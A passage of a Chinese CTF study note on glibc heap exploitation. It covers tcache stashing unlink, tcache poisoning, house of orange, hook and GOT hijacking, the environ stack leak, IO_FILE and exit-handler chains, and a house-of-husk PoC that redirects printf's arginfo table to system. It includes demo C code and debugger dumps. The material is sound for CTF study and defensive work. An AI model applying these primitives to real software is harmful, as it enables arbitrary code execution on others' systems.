victim-&gt;bk pointer. Besides, it&#x27;s necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\\n\\n&quot;); printf(&quot;The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\\n\\n&quot;); printf(&quot;This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we&#x27;ll create the chunk on the stack.\\n\\n&quot;); // stack_var emulate the fake_chunk we want to alloc to printf(&quot;Stack_var emulates the fake chunk we want to alloc to.\\n\\n&quot;); printf(&quot;First let&#x27;s write a writeable address to fake_chunk-&gt;bk to bypass bck-&gt;fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk-&gt;bk + 0x10) which is stack_var[4] will be a libc addr after attack.\\n\\n&quot;); stack_var[3] = (unsigned long)(&amp;stack_var[2]); printf(&quot;You can see the value of fake_chunk-&gt;bk is:%p\\n\\n&quot;,(void*)stack_var[3]); printf(&quot;Also, let&#x27;s see the initial value of stack_var[4]:%p\\n\\n&quot;,(void*)stack_var[4]); printf(&quot;Now we alloc 9 chunks with malloc.\\n\\n&quot;); //now we malloc 9 chunks for(int i = 0;i &lt; 9;i++)&#123; chunk_lis[i] = (unsigned long*)malloc(0x90); &#125; //put 7 chunks into tcache printf(&quot;Then we free 7 of them in order to put them into tcache. Carefully we didn&#x27;t free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\\n\\n&quot;); for(int i = 3;i &lt; 9;i++)&#123; free(chunk_lis[i]); &#125; printf(&quot;As you can see, chunk1 &amp; [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\\n\\n&quot;); //last tcache bin free(chunk_lis[1]); //now they are put into unsorted bin free(chunk_lis[0]); free(chunk_lis[2]); //convert into small bin printf(&quot;Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\\n\\n&quot;); malloc(0xa0);// size &gt; 0x90 //now 5 tcache bins printf(&quot;Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\\n\\n&quot;); malloc(0x90); malloc(0x90); printf(&quot;Now we emulate a vulnerability that can overwrite the victim-&gt;bk pointer into fake_chunk addr: %p.\\n\\n&quot;,(void*)stack_var); //change victim-&gt;bck /*VULNERABILITY*/ chunk_lis[2][1] = (unsigned long)stack_var; /*VULNERABILITY*/ //trigger the attack printf(&quot;Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\\n\\n&quot;); calloc(1,0x90); printf(&quot;Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck-&gt;fd has been changed into a libc addr: %p\\n\\n&quot;,(void*)stack_var[2],(void*)stack_var[4]); //malloc and return our fake chunk on stack target = malloc(0x90); printf(&quot;As you can see, next malloc(0x90) will return the region our fake chunk: %p\\n&quot;,(void*)target); assert(target == &amp;stack_var[2]); return 0;&#125; 核心思路: 123456789101112131415calloc(0xa0)for i in range(6): calloc(0xa0) free(i)calloc(0x4b0) # 9 calloc(0xb0) # 10free(9)calloc(0x400)calloc(0x4b0) # 11calloc(0xb0) # 12free(9)calloc(0x400) #13edit(13, b&#x27;\\x00&#x27;*0x400+p64(prev_size)+p64(size)+p64(target_add-0x10))calloc(0xa0) 限制: 需要UAF 主要适用于只有calloc并且可以分配tcache大小的chunk的情况，对于有malloc，打tcache poison更加方便 效果: 获得任意地址target_addr的控制权：在上述流程中，直接将chunk_A的bk改为target_addr - 0x10，并且保证target_addr - 0x10的bk的fd为一个可写地址（一般情况下，使target_addr - 0x10的bk，即target_addr + 8处的值为一个可写地址即可）。 在任意地址target_addr写入大数值：在unsorted bin attack后，有时候要修复链表，在链表不好修复时，可以采用此利用达到同样的效果，在高版本glibc下，unsorted bin attack失效后，此利用应用更为广泛。在上述流程中，需要使tcache bin中原先有六个堆块，然后将chunk_A的bk改为target_addr - 0x10即可。 tcache poison 主要是通过改写tcache的next指针，实现类似于fastbin的house of spirit的效果。 这个技术非常常用，由于tcache基本没有任何检查，如果需要任意地址分配，这是第一个考虑的技术。 house of orange house of orange 原利用链中的IO_FILE相关利用已经失效了，这里主要关注其绕过无free函数限制的方法，即通过malloc大于top chunk大小的chunk时会先释放top chunk，再拓展堆区域。 一般而言，修改top chunk需要满足一下条件。 伪造的 size 必须要对齐到内存页 size 要大于 MINSIZE(0x10) size 要小于之后申请的 chunk size + MINSIZE(0x10) size 的 prev inuse 位必须为 1 攻击面 劫持控制流 hooks stack IO_FILE dlts libc.got 辅助攻击链 tcache_perthread_struct global_max_fast heap 管理结构 劫持控制流 hooks 堆利用中最基本的夺取控制流的方法就是打各种hooks。 一般而言，可以利用__free_hook 加 写入’/bin/sh’的堆快实现劫持。 此外，如果要打one_gadget的话，可以打__malloc_hook，在tcache之前的版本，更多是打__malloc_hook，因为其在main_arena附近，存在许多libc上地址，方便通过错位构造0x7f的size，此外，由于__malloc_hook和__realloc_hook临近，也可以很方便地同时控制这两个hook，然后通过__realloc_hook配合来调整栈帧，方便满足one gadget 条件 而在glibc2.34版本及以上，各类hooks都已经被移除，因此也需要掌握一些其他的劫持控制流的办法。 stack 在stack overflow 中，通过栈和ROP劫持控制流的方法我们已经不陌生，然而不像stack overflow 天然可以在栈上写入，如果要在heap exploation中通过ROP来劫持控制流，一个无法绕过的问题是栈地址不可知。 我们都知道程序加载时，环境变量会被压入栈中，可以通过environ指针访问到栈上环境变量。 查看glibc源代码 123456#if !_LIBC# define __environ environ# ifndef HAVE_ENVIRON_DECLextern char **environ;# endif#endif 发现这是一个extern变量，在gdb中调试查找 12345678910111213141516171819202122 0x7f78a14d4000 0x7f78a1500000 r--p 2c000 0 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a1500000 0x7f78a1668000 r-xp 168000 2c000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a1668000 0x7f78a16bd000 r--p 55000 194000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a16bd000 0x7f78a16be000 ---p 1000 1e9000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a16be000 0x7f78a16c1000 r--p 3000 1e9000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a16c1000 0x7f78a16c4000 rw-p 3000 1ec000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/libc.so.6 0x7f78a16c4000 0x7f78a16d3000 rw-p f000 0 [anon_7f78a16c4] 0x7f78a16d3000 0x7f78a16d4000 r--p 1000 0 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/ld.so.2 0x7f78a16d4000 0x7f78a16f8000 r-xp 24000 1000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/ld.so.2 0x7f78a16f8000 0x7f78a1702000 r--p a000 25000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/ld.so.2 0x7f78a1702000 0x7f78a1704000 r--p 2000 2e000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/ld.so.2 0x7f78a1704000 0x7f78a1706000 rw-p 2000 30000 /home/nemo/Pwn/workspace/write-ups/MetaCtf.2021/pwn/Hookless/ld.so.2 0x7ffd6bb9e000 0x7ffd6bbc0000 rw-p 22000 0 [stack] 0x7ffd6bbd4000 0x7ffd6bbd8000 r--p 4000 0 [vvar] 0x7ffd6bbd8000 0x7ffd6bbda000 r-xp 2000 0 [vdso]0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall]pwndbg&gt; p environ$1 = (char **) 0x7ffd6bbbdfc8pwndbg&gt; p &amp;environ$2 = (char ***) 0x7f78a16c9ec0 &lt;environ&gt;pwndbg&gt; 可以看到其存在于anon_7f78a16c4段，在libc后，与libc存在固定偏移，猜测这一部分内容与ld 过程有关（笔者暂且还没有查证） 既然可以通过访问libc偏移地址leak stack地址，那么此时我们就可以通过这个栈地址分配到栈上来ROP了。 此攻击点的优点是不像IO_FILE的攻击那样，需要触发程序结束时（exit()函数，从main返回，malloc_assert）时清理现场的流程，可以覆盖堆菜单中分配函数或者edit函数的栈来实现攻击。 libc.got checksec libc，会发现其一般开启了Partial RELRO，所以可以考虑写libc的got表 1234567$ checksec libc.so.6 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 笔者在实际操作时发现，pwntools的elf.got并不能很好解析libc的got段，可以使用IDA来查看。 以下的got表来自libc2.34 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137.got.plt:00000000001ED000 ; Segment type: Pure data.got.plt:00000000001ED000 ; Segment permissions: Read/Write.got.plt:00000000001ED000 _got_plt segment qword public &#x27;DATA&#x27; use64.got.plt:00000000001ED000 assume cs:_got_plt.got.plt:00000000001ED000 ;org 1ED000h.got.plt:00000000001ED000 _GLOBAL_OFFSET_TABLE_ dq offset _DYNAMIC.got.plt:00000000001ED008 qword_1ED008 dq 0 ; DATA XREF: sub_2C000↑r.got.plt:00000000001ED010 qword_1ED010 dq 0 ; DATA XREF: sub_2C000+6↑r.got.plt:00000000001ED018 off_1ED018 dq offset __strnlen_ifunc.got.plt:00000000001ED018 ; DATA XREF: j___strnlen_ifunc↑r.got.plt:00000000001ED018 ; Indirect relocation.got.plt:00000000001ED020 off_1ED020 dq offset __rawmemchr_ifunc.got.plt:00000000001ED020 ; DATA XREF: j___rawmemchr_ifunc↑r.got.plt:00000000001ED020 ; Indirect relocation.got.plt:00000000001ED028 off_1ED028 dq offset __GI___libc_realloc.got.plt:00000000001ED028 ; DATA XREF: _realloc↑r.got.plt:00000000001ED030 off_1ED030 dq offset __strncasecmp_ifunc.got.plt:00000000001ED030 ; DATA XREF: j___strncasecmp_ifunc↑r.got.plt:00000000001ED030 ; Indirect relocation.got.plt:00000000001ED038 off_1ED038 dq offset _dl_exception_create.got.plt:00000000001ED038 ; DATA XREF: __dl_exception_create↑r.got.plt:00000000001ED040 off_1ED040 dq offset __mempcpy_ifunc.got.plt:00000000001ED040 ; DATA XREF: j___mempcpy_ifunc↑r.got.plt:00000000001ED040 ; Indirect relocation.got.plt:00000000001ED048 off_1ED048 dq offset __wmemset_ifunc.got.plt:00000000001ED048 ; DATA XREF: j___wmemset_ifunc↑r.got.plt:00000000001ED048 ; Indirect relocation.got.plt:00000000001ED050 off_1ED050 dq offset __libc_calloc ; DATA XREF: _calloc↑r.got.plt:00000000001ED058 off_1ED058 dq offset strspn_ifunc ; DATA XREF: j_strspn_ifunc↑r.got.plt:00000000001ED058 ; Indirect relocation.got.plt:00000000001ED060 off_1ED060 dq offset memchr_ifunc ; DATA XREF: j_memchr_ifunc↑r.got.plt:00000000001ED060 ; Indirect relocation.got.plt:00000000001ED068 off_1ED068 dq offset __libc_memmove_ifunc.got.plt:00000000001ED068 ; DATA XREF: j___libc_memmove_ifunc↑r.got.plt:00000000001ED068 ; Indirect relocation.got.plt:00000000001ED070 off_1ED070 dq offset __wmemchr_ifunc.got.plt:00000000001ED070 ; DATA XREF: j___wmemchr_ifunc↑r.got.plt:00000000001ED070 ; Indirect relocation.got.plt:00000000001ED078 off_1ED078 dq offset __stpcpy_ifunc.got.plt:00000000001ED078 ; DATA XREF: j___stpcpy_ifunc↑r.got.plt:00000000001ED078 ; Indirect relocation.got.plt:00000000001ED080 off_1ED080 dq offset __wmemcmp_ifunc.got.plt:00000000001ED080 ; DATA XREF: j___wmemcmp_ifunc↑r.got.plt:00000000001ED080 ; Indirect relocation.got.plt:00000000001ED088 off_1ED088 dq offset _dl_find_dso_for_object.got.plt:00000000001ED088 ; DATA XREF: __dl_find_dso_for_object↑r.got.plt:00000000001ED090 off_1ED090 dq offset strncpy_ifunc ; DATA XREF: j_strncpy_ifunc↑r.got.plt:00000000001ED090 ; Indirect relocation.got.plt:00000000001ED098 off_1ED098 dq offset strlen_ifunc ; DATA XREF: j_strlen_ifunc↑r.got.plt:00000000001ED098 ; Indirect relocation.got.plt:00000000001ED0A0 off_1ED0A0 dq offset __strcasecmp_l_ifunc.got.plt:00000000001ED0A0 ; DATA XREF: j___strcasecmp_l_ifunc↑r.got.plt:00000000001ED0A0 ; Indirect relocation.got.plt:00000000001ED0A8 off_1ED0A8 dq offset strcpy_ifunc ; DATA XREF: j_strcpy_ifunc↑r.got.plt:00000000001ED0A8 ; Indirect relocation.got.plt:00000000001ED0B0 off_1ED0B0 dq offset __wcschr_ifunc.got.plt:00000000001ED0B0 ; DATA XREF: j___wcschr_ifunc↑r.got.plt:00000000001ED0B0 ; Indirect relocation.got.plt:00000000001ED0B8 off_1ED0B8 dq offset __strchrnul_ifunc.got.plt:00000000001ED0B8 ; DATA XREF: j___strchrnul_ifunc↑r.got.plt:00000000001ED0B8 ; Indirect relocation.got.plt:00000000001ED0C0 off_1ED0C0 dq offset __memrchr_ifunc.got.plt:00000000001ED0C0 ; DATA XREF: j___memrchr_ifunc↑r.got.plt:00000000001ED0C0 ; Indirect relocation.got.plt:00000000001ED0C8 off_1ED0C8 dq offset _dl_deallocate_tls.got.plt:00000000001ED0C8 ; DATA XREF: __dl_deallocate_tls↑r.got.plt:00000000001ED0D0 off_1ED0D0 dq offset __tls_get_addr.got.plt:00000000001ED0D0 ; DATA XREF: ___tls_get_addr↑r.got.plt:00000000001ED0D8 off_1ED0D8 dq offset __wmemset_ifunc.got.plt:00000000001ED0D8 ; DATA XREF: j___wmemset_ifunc_0↑r.got.plt:00000000001ED0D8 ; Indirect relocation.got.plt:00000000001ED0E0 off_1ED0E0 dq offset memcmp_ifunc ; DATA XREF: j_memcmp_ifunc↑r.got.plt:00000000001ED0E0 ; Indirect relocation.got.plt:00000000001ED0E8 off_1ED0E8 dq offset __strncasecmp_l_ifunc.got.plt:00000000001ED0E8 ; DATA XREF: j___strncasecmp_l_ifunc↑r.got.plt:00000000001ED0E8 ; Indirect relocation.got.plt:00000000001ED0F0 off_1ED0F0 dq offset _dl_fatal_printf.got.plt:00000000001ED0F0 ; DATA XREF: __dl_fatal_printf↑r.got.plt:00000000001ED0F8 off_1ED0F8 dq offset strcat_ifunc ; DATA XREF: j_strcat_ifunc↑r.got.plt:00000000001ED0F8 ; Indirect relocation.got.plt:00000000001ED100 off_1ED100 dq offset __wcscpy_ifunc.got.plt:00000000001ED100 ; DATA XREF: j___wcscpy_ifunc↑r.got.plt:00000000001ED100 ; Indirect relocation.got.plt:00000000001ED108 off_1ED108 dq offset strcspn_ifunc ; DATA XREF: j_strcspn_ifunc↑r.got.plt:00000000001ED108 ; Indirect relocation.got.plt:00000000001ED110 off_1ED110 dq offset __strcasecmp_ifunc.got.plt:00000000001ED110 ; DATA XREF: j___strcasecmp_ifunc↑r.got.plt:00000000001ED110 ; Indirect relocation.got.plt:00000000001ED118 off_1ED118 dq offset strncmp_ifunc ; DATA XREF: j_strncmp_ifunc↑r.got.plt:00000000001ED118 ; Indirect relocation.got.plt:00000000001ED120 off_1ED120 dq offset __wmemchr_ifunc.got.plt:00000000001ED120 ; DATA XREF: j___wmemchr_ifunc_0↑r.got.plt:00000000001ED120 ; Indirect relocation.got.plt:00000000001ED128 off_1ED128 dq offset __stpncpy_ifunc.got.plt:00000000001ED128 ; DATA XREF: j___stpncpy_ifunc↑r.got.plt:00000000001ED128 ; Indirect relocation.got.plt:00000000001ED130 off_1ED130 dq offset __wcscmp_ifunc.got.plt:00000000001ED130 ; DATA XREF: j___wcscmp_ifunc↑r.got.plt:00000000001ED130 ; Indirect relocation.got.plt:00000000001ED138 off_1ED138 dq offset __libc_memmove_ifunc.got.plt:00000000001ED138 ; DATA XREF: j___libc_memmove_ifunc_0↑r.got.plt:00000000001ED138 ; Indirect relocation.got.plt:00000000001ED140 off_1ED140 dq offset strrchr_ifunc ; DATA XREF: j_strrchr_ifunc↑r.got.plt:00000000001ED140 ; Indirect relocation.got.plt:00000000001ED148 off_1ED148 dq offset strchr_ifunc ; DATA XREF: j_strchr_ifunc↑r.got.plt:00000000001ED148 ; Indirect relocation.got.plt:00000000001ED150 off_1ED150 dq offset __wcschr_ifunc.got.plt:00000000001ED150 ; DATA XREF: j___wcschr_ifunc_0↑r.got.plt:00000000001ED150 ; Indirect relocation.got.plt:00000000001ED158 off_1ED158 dq offset __new_memcpy_ifunc.got.plt:00000000001ED158 ; DATA XREF: j___new_memcpy_ifunc↑r.got.plt:00000000001ED158 ; Indirect relocation.got.plt:00000000001ED160 off_1ED160 dq offset _dl_rtld_di_serinfo.got.plt:00000000001ED160 ; DATA XREF: __dl_rtld_di_serinfo↑r.got.plt:00000000001ED168 off_1ED168 dq offset _dl_allocate_tls.got.plt:00000000001ED168 ; DATA XREF: __dl_allocate_tls↑r.got.plt:00000000001ED170 off_1ED170 dq offset __tunable_get_val.got.plt:00000000001ED170 ; DATA XREF: ___tunable_get_val↑r.got.plt:00000000001ED178 off_1ED178 dq offset __wcslen_ifunc.got.plt:00000000001ED178 ; DATA XREF: j___wcslen_ifunc↑r.got.plt:00000000001ED178 ; Indirect relocation.got.plt:00000000001ED180 off_1ED180 dq offset memset_ifunc ; DATA XREF: j_memset_ifunc↑r.got.plt:00000000001ED180 ; Indirect relocation.got.plt:00000000001ED188 off_1ED188 dq offset __wcsnlen_ifunc.got.plt:00000000001ED188 ; DATA XREF: j___wcsnlen_ifunc↑r.got.plt:00000000001ED188 ; Indirect relocation.got.plt:00000000001ED190 off_1ED190 dq offset strcmp_ifunc ; DATA XREF: j_strcmp_ifunc↑r.got.plt:00000000001ED190 ; Indirect relocation.got.plt:00000000001ED198 off_1ED198 dq offset _dl_allocate_tls_init.got.plt:00000000001ED198 ; DATA XREF: __dl_allocate_tls_init↑r.got.plt:00000000001ED1A0 off_1ED1A0 dq offset __nptl_change_stack_perm.got.plt:00000000001ED1A0 ; DATA XREF: ___nptl_change_stack_perm↑r.got.plt:00000000001ED1A8 off_1ED1A8 dq offset strpbrk_ifunc ; DATA XREF: j_strpbrk_ifunc↑r.got.plt:00000000001ED1A8 ; Indirect relocation.got.plt:00000000001ED1B0 off_1ED1B0 dq offset __strnlen_ifunc.got.plt:00000000001ED1B0 ; DATA XREF: j___strnlen_ifunc_0↑r.got.plt:00000000001ED1B0 _got_plt ends ; Indirect relocation 可以看到got表中包含了很多字符串和内存相关函数，包括strlen等，为什么strlen这种在libc中实现的函数会需要走got表呢？ 笔者在glibc2.34的源代码中进行了查找: 12345// string/string.h/* Return the length of S. */extern size_t strlen (const char *__s) __THROW __attribute_pure__ __nonnull ((1)); 123456789101112131415161718192021222324252627282930313233343536373839404142434445// /sysdeps/alpha/strlen.S// ENTRY(strlen)#ifdef PROF ldgp gp, 0(pv) lda AT, _mcount jsr AT, (AT), _mcount .prologue 1#else .prologue 0#endif ldq_u t0, 0(a0) # load first quadword (a0 may be misaligned) lda t1, -1(zero) insqh t1, a0, t1 andnot a0, 7, v0 or t1, t0, t0 nop # dual issue the next two on ev5 cmpbge zero, t0, t1 # t1 &lt;- bitmask: bit i == 1 &lt;==&gt; i-th byte == 0 bne t1, $found$loop: ldq t0, 8(v0) addq v0, 8, v0 # addr += 8 cmpbge zero, t0, t1 beq t1, $loop$found: negq t1, t2 # clear all but least set bit and t1, t2, t1 and t1, 0xf0, t2 # binary search for that set bit and t1, 0xcc, t3 and t1, 0xaa, t4 cmovne t2, 4, t2 cmovne t3, 2, t3 cmovne t4, 1, t4 addq t2, t3, t2 addq v0, t4, v0 addq v0, t2, v0 nop # dual issue next two on ev4 and ev5 subq v0, a0, v0 ret END(strlen)libc_hidden_builtin_def (strlen) 发现在strings.h中，strlen是作为extern函数被引入的，然后发现其真正的实现是在其他文件中通过汇编实现的。 笔者猜测对于glibc对于strlen这种常用操作使用汇编编写来加快执行速度，也因此将其变成了extern 变量。 由于不是很了解编译过程的实现，笔者暂时还无法对此给出完美的解释，因此先在此按下不表，等待之后的深入研究。 而在ctf题中，最常劫持的got表也是strlen，因为其会在puts中被调用，很容易被用到。 同时，在house of pig的攻击流程中，可以将malloc@got作为malloc_hook的替代。 其优点在于像hooks一样劫持方便，只需要libc地址加一次任意分配即可，缺点在与其利用存在限制，并不是所有程序都会用到got表中的函数 此外，很多字符串相关函数，都会调用got表中的函数，因此可以通过此来劫持。 不过在最近的比赛中，笔者打算使用libc.got 时，发现高版本libc似乎很多libc got链用不了了。 同时@kylebot 使用angr挖掘IO_FILE链启发了我，笔者打算写一个用argn挖掘可利用的libc.got的工具 #TODO 稍微鸽一下（ IO_FILE 在高版本的IO_FILE攻击主要是以下几条利用链(实际上大同小异)，基本上都是通过IO_clean_up来劫持控制流 house of apple 2/house of cat: _IO_wide_data 主打一个简单方便 house of Lys 主要在于，一般而言，用largebin attack进行攻击时，IO_FILE 的头我们是控制不了的，所以house of apple2存在一些不方便的地方。 而house of Lys和house of apple2一样简单，并且不需要控制head house of kiwi: _IO_file_jumps 缺点在于_IO_file_jumps在一些版本里是不可写的，而且2.36修改了__malloc_assert house of emma: _IO_cookie_jumps 需要能控制pointer_guard 如果要找到更多的IO_FILE 链呢？ 可以用angr自动化挖掘IO FILE链接 exit() exit 的流程在这篇blog中已经讲述得很详细了， 攻击点如下 __run_exit_handles中的__exit_funcs 需要绕过pointer_guard rtld_global的l_info（指向ELF的Dynamic段） 这是一个ld地址，所以和libc的地址可能会有一些不确定的偏移（和版本有关，可以开个对应版本的docker看看） 虽然Dynamic 段的结构是&lt;idx，偏移&gt;，但其实，l_info 的解析过程中，并不会检测其idx，所以其实只需要伪造偏移就行 通过控制l_info对应idx可以控制dl_fini的析构，主要是两种： fini_array 和 fini fini_array可以用来控制orw fini可以控制到一个函数执行，一般用one_gadget 直接修改libc的__libc_atexit节或者elf的fini_array 然而一个很现实的问题是这两个东西在高版本都已经不可写了 printf-fmt 这一条链来自house of husk的攻击手法 主要是对libc格式化字符串解析过程的攻击。 先看libc是如何解析格式化字符传，通过跟踪调试可以发现，其解析字符是 printf_positional 12345#ifdef COMPILE_WPRINTF nargs += __parse_one_specwc (f, nargs, &amp;specs[nspecs], &amp;max_ref_arg);#else nargs += __parse_one_specmb (f, nargs, &amp;specs[nspecs], &amp;max_ref_arg);#endif 此函数里面通过 __parse_one_cmb 解析格式化字符串，并将其转换为相应specs结构体。 1234567891011spec-&gt;info.spec = (wchar_t) *format++;spec-&gt;size = -1;if (__builtin_expect (__printf_function_table == NULL, 1) || spec-&gt;info.spec &gt; UCHAR_MAX || __printf_arginfo_table[spec-&gt;info.spec] == NULL /* We don&#x27;t try to get the types for all arguments if the formatuses more than one. The normal case is covered though. Ifthe call returns -1 we continue with the normal specifiers. */ || (int) (spec-&gt;ndata_args = (*__printf_arginfo_table[spec-&gt;info.spec]) (&amp;spec-&gt;info, 1, &amp;spec-&gt;data_arg_type, &amp;spec-&gt;size)) &lt; 0) 而在这个解析函数存在这样一个亮点 如果__printf_function_table != 0 并且__printf_arginfo_table[spec-&gt;info.spec] != 0 那么就会调用 __printf_arginfo_table[spec-&gt;info.spec] 这里的info-&gt;spec就是我们的格式化字符(例如’s’, ‘d’) 查看这两个地址： 123456789101112131415161718192021222324252627282930pwndbg&gt; vmmapLEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA Start End Perm Size Offset File 0x400000 0x401000 r--p 1000 0 /home/nemo/Pwn/workspace/basic_overflow/num 0x401000 0x402000 r-xp 1000 1000 /home/nemo/Pwn/workspace/basic_overflow/num 0x402000 0x403000 r--p 1000 2000 /home/nemo/Pwn/workspace/basic_overflow/num 0x403000 0x404000 r--p 1000 2000 /home/nemo/Pwn/workspace/basic_overflow/num 0x404000 0x405000 rw-p 1000 3000 /home/nemo/Pwn/workspace/basic_overflow/num 0x7ffff7dc4000 0x7ffff7dc6000 rw-p 2000 0 [anon_7ffff7dc4] 0x7ffff7dc6000 0x7ffff7dec000 r--p 26000 0 /usr/lib64/libc.so.6 0x7ffff7dec000 0x7ffff7f49000 r-xp 15d000 26000 /usr/lib64/libc.so.6 0x7ffff7f49000 0x7ffff7f96000 r--p 4d000 183000 /usr/lib64/libc.so.6 0x7ffff7f96000 0x7ffff7f9a000 r--p 4000 1d0000 /usr/lib64/libc.so.6 0x7ffff7f9a000 0x7ffff7f9c000 rw-p 2000 1d4000 /usr/lib64/libc.so.6 0x7ffff7f9c000 0x7ffff7fa6000 rw-p a000 0 [anon_7ffff7f9c] 0x7ffff7fc4000 0x7ffff7fc8000 r--p 4000 0 [vvar] 0x7ffff7fc8000 0x7ffff7fca000 r-xp 2000 0 [vdso] 0x7ffff7fca000 0x7ffff7fcb000 r--p 1000 0 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7fcb000 0x7ffff7ff1000 r-xp 26000 1000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ff1000 0x7ffff7ffb000 r--p a000 27000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ffb000 0x7ffff7ffd000 r--p 2000 30000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffff7ffd000 0x7ffff7fff000 rw-p 2000 32000 /usr/lib64/ld-linux-x86-64.so.2 0x7ffffffdd000 0x7ffffffff000 rw-p 22000 0 [stack]0xffffffffff600000 0xffffffffff601000 --xp 1000 0 [vsyscall]pwndbg&gt; p &amp;__printf_arginfo_table $8 = (printf_arginfo_size_function ***) 0x7ffff7f9b8b0 &lt;__printf_arginfo_table&gt;pwndbg&gt; p __printf_function_table $9 = (printf_function **) 0x1000pwndbg&gt; p &amp;__printf_function_table $10 = (printf_function ***) 0x7ffff7f9c9a0 &lt;__printf_function_table&gt; 可以看到这两个的地址都是libc地址，如果存在两个libc任意写，就可以实现劫持。 不过其第一个参数是 spec-&gt;info， info的第一个成员是格式化的输出长度，如果没有指定，就是-1。 然而，一般程序是不会让你控制输出长度（也就是格式化字符前面的数字），所以并没有什么用处，大概率你是控制不了的，只能打one_gadgat。 写了个poc验证： 12345678910111213141516171819202122#include &lt;stdio.h&gt;int main()&#123; printf(&quot;Init Got&quot;); void *libc = *(unsigned long long *)0x404000-0x55c20; printf(&quot;Libc: %p\\n&quot;, libc); unsigned long long fake_arginfo[0x100] = &#123;0&#125;; fake_arginfo[&#x27;s&#x27;] = libc + 0x4f390; // system //fake_arginfo[&#x27;s&#x27;] = libc + 0xfb41f; unsigned long long *print_function = libc + 0x1d69a0; unsigned long long *print_arginfo = libc + 0x1d58b0; *print_arginfo = fake_arginfo; *print_function = 0x100; printf(&quot;Enter a number: %6845243s&quot;); // u32(b&#x27;;sh\\x00&#x27;) = 6845243 // printf(&quot;Enter a number: %1&quot;); return 0;&#125; 辅助攻击 tcache_perthread_struct 1234567891011/* There is one of these for each thread, which contains the per-thread cache (hence &quot;tcache_perthread_struct&quot;). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. */typedef struct tcache_perthread_struct&#123; uint16_t counts[TCACHE_MAX_BINS]; // 2*0x40 = 0x80 tcache_entry *entries[TCACHE_MAX_BINS]; // 8*0x40 = 0x200&#125; tcache_perthread_struct;// 0x20+0x10*0x40 = 0x420 tcache_perthread_struct 是tcache的管理机构，也存在于堆中，如果想办法控制此结构体，即可控制tcache任意分配。 在glibc2.30以下的版本，counts的类型是char，此结构大小是0x250。 一般是作为辅助攻击的方法，可以简化攻击链。 example [[2021-DownUnder-note]] global_max_fast 实际上就是house of corrison的利用，类似的，tcache也有类似的利用。使得大chunk被当作tcache处理。 heap_info 直接攻击堆管理结构体，可以看看这篇帖子:house-of-mind #TODO Tricks 多线程堆 堆布局与分配 以下基于libc 2.35版本讲述 12345678910111213141516171819202122232425262728293031pwndbg&gt; vmmapLEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA Start End Perm Size Offset File 0x56234a398000 0x56234a399000 r--p 1000 0 /home/nemo/Pwn/workspace/2023ycb/heap/heap 0x56234a399000 0x56234a39a000 r-xp 1000 1000 /home/nemo/Pwn/workspace/2023ycb/heap/heap 0x56234a39a000 0x56234a39b000 r--p 1000 2000 /home/nemo/Pwn/workspace/2023ycb/heap/heap 0x56234a39b000 0x56234a39c000 r--p 1000 2000 /home/nemo/Pwn/workspace/2023ycb/heap/heap 0x56234a39c000 0x56234a39f000 rw-p 3000 3000 /home/nemo/Pwn/workspace/2023ycb/heap/heap 0x56234b28e000 0x56234b2af000 rw-p 21000 0 [heap] 0x7fc4627fd000 0x7fc4627fe000 ---p 1000 0 [anon_7fc4627fd] 0x7fc4627fe000 0x7fc462ffe000 rw-p 800000 0 [anon_7fc4627fe] 0x7fc462ffe000 0x7fc462fff000 ---p 1000 0 [anon_7fc462ffe] 0x7fc462fff000 0x7fc4637ff000 rw-p 800000 0 [anon_7fc462fff] 0x7fc4637ff000 0x7fc463800000 ---p 1000 0 [anon_7fc4637ff] 0x7fc463800000 0x7fc464000000 rw-p 800000 0 [anon_7fc463800] 0x7fc464000000 0x7fc464021000 rw-p 21000 0 [anon_7fc464000] 0x7fc464021000 0x7fc468000000 ---p 3fdf000 0 [anon_7fc464021] 0x7fc4685fa000 0x7fc4685fb000 ---p 1000 0 [anon_7fc4685fa] 0x7fc4685fb000 0x7fc468dfb000 rw-p 800000 0 [anon_7fc4685fb] 0x7fc468dfb000 0x7fc468dfc000 ---p 1000 0 [anon_7fc468dfb] 0x7fc468dfc000 0x7fc4695fc000 rw-p 800000 0 [anon_7fc468dfc] 0x7fc4695fc000 